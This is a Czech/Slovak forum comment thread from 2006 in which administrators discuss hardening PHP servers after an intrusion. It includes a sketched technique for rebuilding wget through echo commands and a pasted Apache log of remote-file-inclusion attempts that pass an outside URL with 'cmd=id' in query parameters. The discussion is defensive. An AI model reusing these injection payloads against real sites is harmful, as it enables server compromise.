Portál AbcLinuxu, 18. května 2024 03:08


Nástroje: Začni sledovat (3) ?Zašle upozornění na váš email při vložení nového komentáře.

Vložit další komentář
11.7.2006 02:58 Creckx | skóre: 23 | blog: cxblog | Lanškroun
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Odpovědět | Sbalit | Link | Blokovat | Admin
Už je to dlouho co jsem si hrál s nastavováním PHP. Nemá náhodou něco jako SafeMode, kterej znepřístupní nebezpečné fce? Jinak bych to neřešil :) DoS útoky jsou větší hnus, tohle je ještě sranda :)
Můj blog Pokud máte taky blog, můžeme vyměnit odkazy :)
12.7.2006 14:50 xadam | skóre: 1 | blog: adam
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Ano to je pravda, mal som moznost vidiet jadan priebeh organizovaneho DOS utoku. Bol tam paradny trafik, niekolko sto megabit :)
12.7.2006 17:16 Creckx | skóre: 23 | blog: cxblog | Lanškroun
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Šéf jen co zapojil server do sítě tak stovky IP adres se začalo dotazovat. Pěkně přes POST tlačily data :)
Můj blog Pokud máte taky blog, můžeme vyměnit odkazy :)
11.7.2006 06:59 Ladislav Sückr | skóre: 21
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Odpovědět | Sbalit | Link | Blokovat | Admin

Ten wget a kompilátor máte na produkčním serveru?

Myslet špatně je lepší než nemyslet vůbec.
11.7.2006 08:08 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Třeba s Gentoo je docela problém nemít wget a kompilátor. I když taky to jde, samozřejmě…

Spíš je IMHO důležité útočníka na server vůbec nepustit. Když už může vykonávat shell skripty kdekoliv z internetu, není pro něj problém vykonávat po částech shell script 
echo "blabla" > wget
echo "bleble" >> wget
chmod u+x wget
A takhle si na server poslat svou kopii staticky slinkovaného wgetu. A tím si pak stáhnout kompilátor.
David Watzke avatar 11.7.2006 11:23 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Gentoo bez kompilátoru je jako ryba bez vody, herní stanice bez monitoru, já bez počítače, nebo prdel bez hrnce - nemožný :-)
“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
Heron avatar 11.7.2006 11:39 Heron | skóre: 53 | blog: root_at_heron | Olomouc
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Ale tady jde o komerční server, ne o hračku pro děti ;-)
Heron
David Watzke avatar 11.7.2006 11:54 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Ňákej vostrej ... ;-)
“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
11.7.2006 12:26 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Fakt? To nejde ani přeložit balíčky jinde a na serveru instalovat binární verze?
When your hammer is C++, everything begins to look like a thumb.
David Watzke avatar 11.7.2006 12:31 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Jasně že jde, ale víš jak to myslím. Je to proti přírodě :-D Taky můžeš mít herní stanici bez monitoru.
“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
11.7.2006 12:31 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Samozdrejme, ze to de, jenom to nedela.
12.7.2006 01:01 Ondřej Čečák | skóre: 33
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
To mi jako problem nepripada, vzhledem k tomu, ze si ten wget muzu treba pomoci diry v PHP na system protlacit a pak si cokoli dalsiho treba zkompilovat a stahnout -- rychle a celkem elegantne.
-- "Ja vim, on vi, ty pico!"
11.7.2006 08:02 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Odpovědět | Sbalit | Link | Blokovat | Admin
Především by web server neměl běžet s právy roota, ale pod nějakým uživatelem, kterému vhodně omezím přístup.
11.7.2006 10:05 Aldagautr | skóre: 20
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Odpovědět | Sbalit | Link | Blokovat | Admin
muzes zacit tady
o svobodu prichazi nejsnaze ten, kdo o ni nikdy nebojoval
11.7.2006 11:10 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Odpovědět | Sbalit | Link | Blokovat | Admin
Protoze potrebuji tahat nektere stranky online z jineho serveru tak jsem server zabezpecil tak, ze jsem v iptables zakazal odchozi spojeni na vsechny krome vybranych serveru (DNS, SMTP a par dalsich). Bohuzel si myslim, ze kdyz clovek provozuje PHP aplikace tretich stran, tak si nikdy nemuze byt jisty, ze na serveru nema diru :-(. Takze mozna neco jako bezici snort, semtam skusit nessus (stalo se mi, ze mi rekl o dire ktera byla v jedne aplikaci co provozuji), pravidelne zalohovat a modlit se :-(. Doufam, ze me nikdo za to co delam neukamenuje (nemyslim si, ze jsem dobry administrator, sem spise programator a tak ten server i vypada, ale snazim se).
11.7.2006 23:56 Jakub Suchy | skóre: 22 | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Staci v php.ini dat allow_url_fopen Off a open_basedir na domovsky adresar uzivatele a /tmp. bohuzel je to nutne udelat per virtualhost...
Drupal
11.7.2006 11:28 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Odpovědět | Sbalit | Link | Blokovat | Admin
Jeste pro pobaveni jak jsem si zabezpecit server (pouzivaji ho jen ostatni servery pro autentizaci uzivatelu) . Tak jsem ho zabezpecoval pres iptables, az se mi podarilo zabit ssh port. To by nebylo tak hrozne, kdyby jsem k tomu serveru mel pripojenou klavesnici a monitor. Zatim sem se jeste nedokopal k tomu, abych to obnovil :-)
12.7.2006 22:24 xadam | skóre: 1 | blog: adam
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
asi ti pristup k tomu serveru nechyba ze? ...:) Mame spravene tiez iptablesy, je to vcelku dobra vec. Ale pri velkom pocte pocitacov clovek obcas na nieco zabudne, lebo robi moc rychlo ked je vela inej prace ;)
11.7.2006 23:32 diverman | skóre: 32 | blog: život s tučňáčkem
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Odpovědět | Sbalit | Link | Blokovat | Admin
To se mi taky stalo, zalozil jsem u sebe docasny ucet se stejnym jmenem a heslem, ktery jsem potom zapomel vymazat. A on si tam wgetem stahl nejaky scannery, brutal-forcy atd... Vic se nestalo. A zapomel po sobe vymazat .bash_history :-)
deb http://ftp.cz.debian.org/debian jessie main contrib non-free
12.7.2006 02:46 k3 | skóre: 15 | blog:  
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
krom toho, ze to vypada na slusnou lamu tak to nedela jen pro zabavu... mezi tema jeho vecma se da najit par divnejch veci.. napr ebay.zip moc jsem toho teda nestahl.. kdyz jsem si to chtel zmirrorovat tak na te sajte dosel traffic limit :(
10.11.2006 15:07 xadam | skóre: 1 | blog: adam
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
Odpovědět | Sbalit | Link | Blokovat | Admin
stle sa vedu utoky podobneho charakteru. prikladam vypis z konzoly (access_log) apache 
more /var/log/apache/access_log | grep http:// | grep 10/Nov/2006
82.7.25.196 - - [10/Nov/2006:00:18:21 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
70.42.51.20 - - [10/Nov/2006:01:58:54 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
193.179.220.253 - - [10/Nov/2006:06:34:23 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
84.47.91.200 - - [10/Nov/2006:08:34:44 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
193.87.64.155 - - [10/Nov/2006:09:15:21 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.0" 200 72
195.91.54.84 - - [10/Nov/2006:12:56:18 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
195.49.188.227 - - [10/Nov/2006:12:59:30 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.0" 200 72
151.56.239.254 - - [10/Nov/2006:14:21:32 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
151.56.239.254 - - [10/Nov/2006:14:21:34 +0100] "GET /index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
151.56.239.254 - - [10/Nov/2006:14:21:35 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:58:30 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:58:58 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:59:00 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:15:03:45 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:15:04:32 +0100] "GET //index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
193.87.65.21 - - [10/Nov/2006:15:04:44 +0100] "GET //index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
193.87.65.21 - - [10/Nov/2006:15:05:24 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.